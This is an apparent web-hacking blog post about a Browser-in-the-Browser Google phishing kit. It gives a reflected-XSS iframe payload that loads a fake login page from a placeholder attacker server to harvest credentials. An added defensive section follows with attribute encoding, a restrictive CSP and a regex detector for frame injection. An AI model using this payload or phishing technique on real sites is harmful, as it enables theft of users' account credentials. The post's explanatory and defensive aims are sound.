# Week 21 - Google BITB

## Google Browser-In-The-Browser Phishing

For week 21 of the web hacking series, I was looking to improve upon the GooglePhishing repository I made last week. I saw some of your comments/messages about combining it with a Browser-in-the-Browser (BITB) attack. I thought this would allow for a super convincing phishing attack, so I did some research and built it out:

<https://github.com/jakedmurphy1/GoogleBITB>

I think this is one of the most convincing techniques I've seen in recent years. It is definitely tricky to spot if you are not paying close attention or are not familiar with web technologies.

Additionally, I discovered a pretty cool attack vector using BITB. You can inject the Cross-Site Scripting payload below into an application:

`"><iframe style='border:none;width:100%;height:100%' scrolling='no' src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>`

As long as the attacker server uses https, it will successfully render the iframe within an iframe (inception) and prompt the user to log in to the Google popup, which appears to come from the vulnerable application. The https requirement exists because an https page will not load an http iframe: browsers block it as mixed content. This technique can allow you to harvest credentials with just a reflected XSS attack!

This goes to show the dangers of allowing XSS within your application, and the importance of thorough pentesting. The chain only works because the reflected input is written into the page unencoded and the application's Content-Security-Policy (if any) lets the page frame an arbitrary origin, so those are the two controls to check for.
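The following is an added example, not code from the post or from the GoogleBITB repository, showing the two controls from a defender's side: context-aware output encoding that neutralises the `">` attribute break-out, a Content-Security-Policy that refuses to frame an origin the application does not own, and a small detector for the injection pattern in request parameters. The attacker host (`attacker.example`), the application origin (`app.example`) and the `<input value="...">` reflection point are assumptions chosen for the demonstration.

```javascript
// Added example (not from the original post). Assumed setup: an https page that
// reflects the `q` query parameter into an HTML attribute, <input value="...">.
// The payload below is the one from the post, with a constructed placeholder host.
const PAYLOAD =
  `"><iframe style='border:none;width:100%;height:100%' scrolling='no' ` +
  `src='https://attacker.example/GoogleBITB/index.html'/>`;

// 1. Context-aware encoding for the HTML attribute context: every character that
//    can terminate an attribute or open a tag becomes a numeric entity.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"'`=\/]/g,
    (ch) => `&#x${ch.charCodeAt(0).toString(16)};`);
}

// Vulnerable rendering: raw interpolation, which is what the post's payload exploits.
function renderVulnerable(q) {
  return `<input name="q" value="${q}">`;
}

// Hardened rendering: same template, encoded for the attribute context.
function renderSafe(q) {
  return `<input name="q" value="${escapeHtmlAttr(q)}">`;
}

// 2. A CSP that only allows the page to frame origins the application controls.
//    With frame-src 'none' (the default here) an injected <iframe> is refused
//    by the browser even if the injection itself lands in the DOM.
function buildCsp({ self = "'self'", frameSources = [] } = {}) {
  const frameSrc = frameSources.length ? frameSources.join(' ') : "'none'";
  return [
    `default-src ${self}`,
    `frame-src ${frameSrc}`,
    `frame-ancestors ${self}`,
    `object-src 'none'`,
  ].join('; ');
}

// 3. Detection: flag a parameter value that closes a quoted attribute and then
//    opens a frame-, object- or script-like element. URL-decoded first, since the
//    value arrives percent-encoded in the query string.
const BREAKOUT_RE = /["'][^<]*>\s*<\s*(iframe|frame|object|embed|script)\b/i;

function looksLikeFrameInjection(paramValue) {
  let decoded = paramValue;
  try { decoded = decodeURIComponent(paramValue); } catch (_) { /* keep raw */ }
  return BREAKOUT_RE.test(decoded);
}

// Post-render check: does the HTML contain a live <iframe> whose src origin is not
// on the allow-list? Relative URLs are resolved against the assumed app origin;
// an unparseable src is treated as foreign.
function containsForeignIframe(html, allowedOrigins = []) {
  const re = /<iframe\b[^>]*\bsrc=['"]?([^'" >]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let origin;
    try { origin = new URL(m[1], 'https://app.example').origin; } catch (_) { return true; }
    if (!allowedOrigins.includes(origin)) return true;
  }
  return false;
}

// Stand-alone demonstration.
console.log('vulnerable frames attacker:',
  containsForeignIframe(renderVulnerable(PAYLOAD), ['https://app.example']));
console.log('hardened frames attacker:  ',
  containsForeignIframe(renderSafe(PAYLOAD), ['https://app.example']));
console.log('detector flags payload:    ', looksLikeFrameInjection(PAYLOAD));
console.log('CSP header:                ', buildCsp());
```

The encoding fix is the one that removes the bug; the CSP is defence in depth that also covers reflection points you have not found yet, and the detector is a cheap signal for a WAF rule or log search. Note that CSP `frame-src` governs what the page may embed, which is the control relevant here; `frame-ancestors` (who may embed the page) does not stop this chain on its own.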

![](/files/U57G6Fuh2HIUUIunPacq)

